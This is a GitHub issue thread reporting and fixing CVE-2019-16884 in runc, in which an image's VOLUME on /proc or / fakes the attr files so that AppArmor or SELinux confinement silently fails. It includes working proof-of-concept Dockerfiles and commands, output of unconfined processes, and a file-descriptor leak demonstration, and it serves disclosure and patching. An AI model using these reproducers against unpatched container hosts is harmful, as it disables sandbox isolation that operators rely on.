AppArmor can be bypassed by a malicious image that specifies a volume at /proc
leoluk opened this issue · 25 comments
A malicious volume can specify a volume mount on /proc
. Since Docker populates the volume by copying data present in the image, it's possible to build a fake structure that will trick runc into believing it had successfully written to /proc/self/attr/exec
:
runc/libcontainer/apparmor/apparmor.go
Lines 23 to 25 in 7507c64
This is possible because apparmor.ApplyProfile is executed in the container rootfs, after pivot_root in prepareRootfs:
runc/libcontainer/standard_init_linux.go
Lines 115 to 117 in 7507c64
checkMountDestinations is supposed to prevent mounting on top of /proc
:
runc/libcontainer/rootfs_linux.go
Lines 464 to 469 in 7507c64
... but the check does not work. I believe the reason is that the dest
argument is resolved to an absolute path using securejoin.SecureJoin
(before pivot_root), unlike the blacklist in checkMountDestinations, which is relative to the rootfs:
runc/libcontainer/rootfs_linux.go
Lines 414 to 419 in 7507c64
Minimal proof of concept (on Ubuntu 18.04):
mkdir -p rootfs/proc/self/{attr,fd}
touch rootfs/proc/self/{status,attr/exec}
touch rootfs/proc/self/fd/{4,5}
cat <<EOF > Dockerfile
FROM busybox
ADD rootfs /
VOLUME /proc
EOF
docker build -t apparmor-bypass .
docker run --rm -it --security-opt "apparmor=docker-default" apparmor-bypass
# container runs unconfined
Not a critical bug on its own, but should get a CVE assigned.
Discovered by Adam Iwaniuk and disclosed during DragonSector CTF (https://twitter.com/adam_iwaniuk/status/1175741830136291328).
The CTF challenge mounted a file to /flag-<random>
and denied access to it using an AppArmor policy. The bug could then be used to disable the policy and read the file: https://gist.github.com/leoluk/2513b6bbff8aa5cd623f3d7d7f20871a
Yeah this looks like I messed up the path checking when porting to securejoin.SecureJoin
. I will request a CVE and all the rest of that jazz.
Though I do just want to say -- given this was an intended solution to a CTF, it's a shame that we didn't get pinged about it by the organisers beforehand at security@opencontainers.org (or I guess security@docker.com).
It should be noted that the previous check (before we did securejoin
) was also wrong -- you could make a symlink to /
and then try to mount under it to bypass the protection (this is why I changed it). So really we need to take the relative-to-the-root path to do the comparison.
We currently have this PR that changed the logic #1832
@giuseppe how do you think we should handle fixing this where we still have the ability to bind proc in rootless containers? Maybe only allow proc mounts if rootless or check that what is being mounted on /proc
is a procfs?
I think both solutions would work. I am not familiar with AppArmor (and out of office this week to try it out), but would it be possible to set the apparmor profile before pivoting to the new rootfs?
CVE-2019-16884 has been assigned for this issue.
I looked into it some more, and this affects explicit SELinux labels as well:
runc/libcontainer/standard_init_linux.go
Lines 149 to 152 in 3e425f8
via:
At least on Red Hat-derived distributions, the sVirt profile is applied by default so the impact is likely smaller, but it means that it's not just Ubuntu that is affected.
@leoluk Yeah, because they both use the /proc/self/attr/...
for setting labels. However, you would still be (at least slightly) constrained by container_runtime_t
because on SELinux systems the runtime itself is also constrained by a profile.
As pointed out by @bennofs in #2129, mounting to /
has the same result:
# Ubuntu 18.04
mkdir -p rootfs/proc/self/{fd,attr}
touch rootfs/proc/self/{status,fd/4,fd/5,attr/exec}
cat <<EOF > Dockerfile
FROM busybox
ADD rootfs /
VOLUME /
EOF
docker build -t apparmor-bypass .
docker run --rm -it --security-opt "apparmor=docker-default" apparmor-bypass sleep 10
sleep
runs unconfined:
$ ps fauxZ
[...]
unconfined root 2696 0.4 2.0 660048 41344 ? Ssl 00:23 0:00 /usr/bin/containerd
unconfined root 4959 0.0 0.2 10616 4716 ? Sl 00:25 0:00 \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/33fd9e0a780ccd57d2581de6ae4ec317946c6f316174231660f4b39576a1d7d1 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
unconfined root 4985 1.7 0.0 1292 4 ? Ss 00:25 0:00 \_ sleep 10
unconfined root 5018 0.3 0.3 462252 7628 ? Sl 00:25 0:00 \_ runc --root /var/run/docker/runtime-runc/moby --log /run/containerd/io.containerd.runtime.v1.linux/moby/33fd9e0a780ccd57d2581de6ae4ec317946c6f316174231660f4b39576a1d7d1/log.json --log-format json start 33fd9e0a780ccd57d2581de6ae4ec317946c6f316174231660f4b39576a1d7d1
The problem is that some workloads depend on mounting things to /
-- so we can't just block it wholesale. It looks like we'll need to move when we do label setting.
I want to re-iterate that we could've worked through these issues more easily if the issue had been reported privately first. I get that "responsible disclosure" is a dirty word these days, but that's because of how proprietary software companies have reacted to disclosures in the past -- we're a free software project and so surely it should be clear that we aren't going to act in that manner. But I guess it's too late to have that conversation now.
Alternatively we could check whether the file we're opening during labeling is actually on procfs
and if it isn't we bail. This could be bypassed (by bind-mounting a random other file from procfs
that happens to be writeable but a no-op) but you can't really do that using VOLUME
(you'd need to create a bad config.json
manually -- and there isn't much we can do to protect against those).
EDIT: I've sent opencontainers/selinux#59 and #2130 to do the above. The mount-to-/
reproducer no longer works with that change.
FYI, this does not seem to effect SELinux.
cat selinux.sh
touch rootfs/proc/self/{status,attr/exec}
touch rootfs/proc/self/fd/{4,5}
cat <<EOF > Dockerfile
FROM busybox
ADD rootfs /
VOLUME /proc
EOF
podman build -t selinux-bypass .
podman run --rm -it selinux-bypass cat /proc/self/attr/current
./selinux.sh
STEP 1: FROM busybox
Getting image source signatures
Copying blob 7c9d20b9b6cd done
Copying config 19485c79a9 done
Writing manifest to image destination
Storing signatures
STEP 2: ADD rootfs /
bb109b6aee845b7682bf1d2d6e897b3a20fe190d1a24233c8044d47a70c590fc
STEP 3: VOLUME /proc
STEP 4: COMMIT selinux-bypass
98c8ca03d983f9109783cc340cc1c995c376ac008ca7e3d89c9a6b2e9b9bfda3
system_u:system_r:container_t:s0:c24,c219
The label would not be container_t if the process was unconfined.
Actually I was mistaken. I was testing with crun not runc. runc does not work on F31 right now, so no easy way to fix.
I can reproduce the SELinux bypass using Docker CE 19.03.2 with runc at 84373aa on Fedora 30 (same reproducer as above, plus --selinux-enabled
in docker.service):
$ docker run --rm --runtime=runc-git -v /proc:/proc2 busybox \
cat /proc2/self/attr/current
system_u:system_r:container_t:s0:c504,c813
$ docker run --rm --runtime=runc-git -v /proc:/proc2 selinux-bypass \
cat /proc2/self/attr/current
system_u:system_r:spc_t:s0
@leoluk If you apply the two PRs I've posted (you'll need to apply the go-selinux one to the vendor/ tree), can you still reproduce it? In theory we should be relying on the parent process to set up labels but we'll have to implement that later...
I reviewed the PRs, fix looks solid. Of course, not being in attacker-controlled territory would be best, on the other hand, a sane PaaS would not let untrusted users specify bind/procfs mounts.
With opencontainers/selinux#59 applied to the vendored version in runc master and built using make BUILDTAGS='seccomp selinux'
, I can't reproduce the issue anymore and it fails with the expected error message:
docker: Error response from daemon: OCI runtime create failed: container_linux.go:346: starting container process caused "set process label: /proc path not on procfs: /proc/self/task/1/attr/exec": unknown.
Can't think of a way to bypass it using only VOLUME
. Did not test the AppArmor fix but LGTM.
I want to re-iterate that we could've worked through these issues more easily if the issue had been reported privately first. I get that "responsible disclosure" is a dirty word these days, but that's because of how proprietary software companies have reacted to disclosures in the past -- we're a free software project and so surely it should be clear that we aren't going to act in that manner. But I guess it's too late to have that conversation now.
Agreed. Can't really comment on that, since I'm not the one who found the bug and had no prior knowledge of it. I use runc in production and want to help fix this as thoroughly as possible. Thanks y'all for your efforts!
Actually, I can think of one more thing to fix - finalizeNamespace
-> utils.CloseExecFrom
looks at /proc/self/fd
to determine which fds to close:
runc/libcontainer/utils/utils_unix.go
Lines 13 to 17 in 84373aa
This can also be bypassed using VOLUME /
and leaks fd 4 to the container:
$ docker run --rm --runtime=runc-git -v /proc:/dev/shm/proc poc ls -lisa /dev/shm/proc/self/fd
ls: /dev/shm/proc/self/fd/3: cannot read link: No such file or directory
total 0
1582842 0 dr-x------ 2 root root 0 Sep 27 18:12 .
1582841 0 dr-xr-xr-x 9 root root 0 Sep 27 18:12 ..
1582843 0 lrwx------ 1 root root 64 Sep 27 18:12 0 -> /dev/null
1582844 0 l-wx------ 1 root root 64 Sep 27 18:12 1 -> pipe:[1582813]
1582845 0 l-wx------ 1 root root 64 Sep 27 18:12 2 -> pipe:[1582814]
1582888 0 lr-x------ 1 root root 64 Sep 27 18:12 3
1582889 0 l-wx------ 1 root root 64 Sep 27 18:12 4 -> pipe:[1582825]
I wrote a quick stap script to audit things that take place after pivot_root:
https://gist.github.com/leoluk/72531d264ae5cc9ff1d467dd097a8081
Yes we can do a statfs
check there too. I'll update #2130. Though it should be noted that we no longer have any file descriptors to leak into the container that are super useful for attackers -- I fixed that as part of the patch for CVE-2016-9962.
Of course, not being in attacker-controlled territory would be best
I just remembered why we can't do this for AppArmor. There is kernel limitation that the only process which can change the AppArmor label for a given process is itself -- you cannot change the label for any other process (even as root).
We can work around it by passing a file descriptor to /proc/self/attr/...
but this is quite dangerous given it was used as an exploit vector for LXC in 2015-2016.
We can work around it by passing a file descriptor to /proc/self/attr/... but this is quite dangerous given it was used as an exploit vector for LXC in 2015-2016.
I think this is the bug in question: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1639345
They were passing a directory fd to /proc/ and due to a kernel bug, you could win a race and ptrace the process as it entered the namespace to elevate privileges inside the container, then use the fd to escape. Docker drops CAP_SYS_PTRACE and either way passing just a file fd should be safe, no?
Even if the fd fails to be closed, the AppArmor profile or SELinux policy won't allow an additional transition.
The problem is that most users of runc
don't use user namespaces. Yes, there are (many) protections against attacking an attaching process to a user namespace (in fact these days userns privilege checks for ptrace_may_access
are done specifically to protect attaching container runtimes).
But if you don't use user namespaces you're in some amount of trouble even without CAP_SYS_PTRACE
. Yes, the fact we O_CLOEXEC
and have PR_SET_DUMPABLE
set helps protect us against this in general, but this is all bandaid security. If we could simply force users to use user namespaces then it wouldn't be a problem at all.
The use of ptrace
in the particular LXC attack is actually a red herring -- see CVE-2016-9962. Though, it doesn't help that half the kernel functions related to processes have "ptrace" in their name even though they are unrelated to ptrace(2)
. sigh
the AppArmor profile or SELinux policy won't allow an additional transition
The issue is that once you have a file descriptor for /proc/self/attr
from the host mount namespace you can use it to walk to the host mount namespace's root (there are workarounds for this such as O_PATH
descriptors and all that fun stuff, but it would require pretty large changes to go-selinux
). We could try stashing a copy of the container's /proc
when we mount it (avoiding that problem entirely) but that would make rootfs_linux
even more complicated without a solid argument for why the complexity is worth it.
Great explanation! Sure, as soon as you get a dir fd from the host mount namespace, it's over. But couldn't we open the file itself before pivoting, then write to it and close it after? Anything you can do to a filefd besides writing to it that I'm missing?
This is what I was referring to with "O_PATH
re-opening" -- you definitely could do that (and we already do this for the whole create+start workflow of runc
). But it would require some pretty big changes to go-selinux
so that it takes a file handle for all the possible /proc
paths (not to mention that we'd need to open every file inside /proc/$pid/attr
and not get them mixed up otherwise we'll end up writing the wrong policy).
Don't get me wrong, it would definitely not be a bad idea to do something like that (and I'm not against it) -- I'm just a little bit worried how complicated it would get (and how much safety it would buy us over the best-effort statfs(2)
stuff I just pushed).
Anything you can do to a filefd besides writing to it that I'm missing?
There are some other dodgy things you can do (with things like open_by_handle_at
), but all of the ones I can think of require privileges.
This has been fixed and is now in the rc9
release.